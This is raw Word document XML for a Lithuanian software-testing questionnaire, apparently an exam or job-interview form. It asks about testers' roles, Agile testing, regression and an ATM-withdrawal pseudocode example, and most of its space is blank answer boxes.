        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip manote, kod</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėl</w:t>
      </w:r>
      <w:r w:rsidR="00B9741D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> reikia testuoti programinę</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> įrangą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0C97" w:rsidRPr="00AD4464" w:rsidRDefault="009E0C97" w:rsidP="00372B3A">
      <w:pPr>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7F0ADF" w:rsidRPr="00AD4464" w:rsidTr="002D59EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00612ED1" w:rsidRDefault="00612ED1" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007F0ADF" w:rsidRPr="00AD4464" w:rsidRDefault="007F0ADF" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip manote, kokia testuotojo savybė yra svarbiausia?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB1E03" w:rsidRPr="00AD4464" w:rsidRDefault="00CB1E03" w:rsidP="00372B3A">
      <w:pPr>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253D42" w:rsidRPr="00AD4464" w:rsidTr="002D59EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00612ED1" w:rsidRDefault="00612ED1" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00253D42" w:rsidRPr="00AD4464" w:rsidRDefault="00253D42" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Parašykite, kaip testuotumėte žemiau pateiktą formą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD7557" w:rsidRPr="00AD4464" w:rsidRDefault="00DD7557" w:rsidP="00372B3A">
      <w:pPr>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911"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68163FB4" wp14:editId="3896CC7C">
                  <wp:extent cx="1722755" cy="2319020"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17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22755" cy="2319020"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6911" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0018107E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Iš</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>vardykite jums žinomas testuotojo roles ir atsakomybes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C927A9" w:rsidRPr="00AD4464" w:rsidRDefault="00C927A9" w:rsidP="00372B3A">
      <w:pPr>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253D42" w:rsidRPr="00AD4464" w:rsidTr="002D59EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00612ED1" w:rsidRDefault="00612ED1" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00253D42" w:rsidRPr="00AD4464" w:rsidRDefault="00253D42" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002659B" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kas </w:t>
      </w:r>
      <w:r w:rsidR="008D2344" w:rsidRPr="00AD4464">
        <w:t>klaidinga</w:t>
      </w:r>
      <w:r w:rsidR="00B9741D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> žemiau pateiktame paveiksliuke</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>? Paaiškinkite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="-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631"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2F80B3" wp14:editId="156909BA">
                  <wp:extent cx="1945822" cy="2275027"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17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51511" cy="2281678"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6911" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w: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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuo s</w:t>
      </w:r>
      <w:r w:rsidR="009615F5" w:rsidRPr="00AD4464">
        <w:t>kiriasi testavimas Agile komand</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ose (arba Agile testavimas) nuo kitų?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4690" w:rsidRPr="00AD4464" w:rsidRDefault="003D4690" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>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713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F712CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>vardykite žemiau pateiktų veiklų</w:t>
      </w:r>
      <w:r w:rsidR="00711BEC" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> privalumus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3270" w:rsidRPr="00AD4464" w:rsidRDefault="00EA3270" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>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713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Testavimas (testų vykdymas):</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Testų automatizavimas:</w:t>
            </w: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713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar programuotojai turi testuoti? Paaiškinkite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3B10" w:rsidRPr="00AD4464" w:rsidRDefault="009D3B10" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>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713028" w:rsidRPr="00AD4464" w:rsidTr="00675FA8">
        <w:trPr>
          <w:trHeight w:val="1377"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w: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713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Koks bus naujas sąskaitos balansas, jei pradinis balansas lygus. a) $212, b) $99?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A17C41" w:rsidRPr="00AD4464" w:rsidRDefault="00A17C41" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>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0"/>
        <w:gridCol w:w="6203"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>01  if balance is less than $100</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>02 print "Insufficient funds"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>03  else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>04  issue $100 cash from machine</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>05  calculate new balance</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>06  print new balance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6203" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>a)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E34954" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuriai</w:t>
      </w:r>
      <w:r w:rsidR="00802E7A" w:rsidRPr="00AD4464">
        <w:t>s atvejais testavim</w:t>
      </w:r>
      <w:r w:rsidR="00F712CA" w:rsidRPr="00AD4464">
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> gali tekti pakartoti? Galimi keli teisingi ats</w:t>
      </w:r>
      <w:r w:rsidR="00F712CA" w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>kymai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00802E7A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>ai praėjo daug laiko nuo paskutinio testavimo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00802E7A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>ai sistemoje buvo atlikta pakeitimų;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00802E7A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>ai testavimo rezultatai buvo nepatenkinami ir Sistema grąžinta gerinimui;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00802E7A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>kai testa</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t>mo a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>plinka testavimo metu buvo labai</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> nestabili</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F712CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Ar svarbūs</w:t>
      </w:r>
      <w:r w:rsidR="00713028" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> prioritetai testavime? Kodėl?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB5922" w:rsidRPr="00AD4464" w:rsidRDefault="00FB5922" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="00713028" w:rsidRPr="00AD4464" w:rsidTr="00F55F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Toc14392414"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
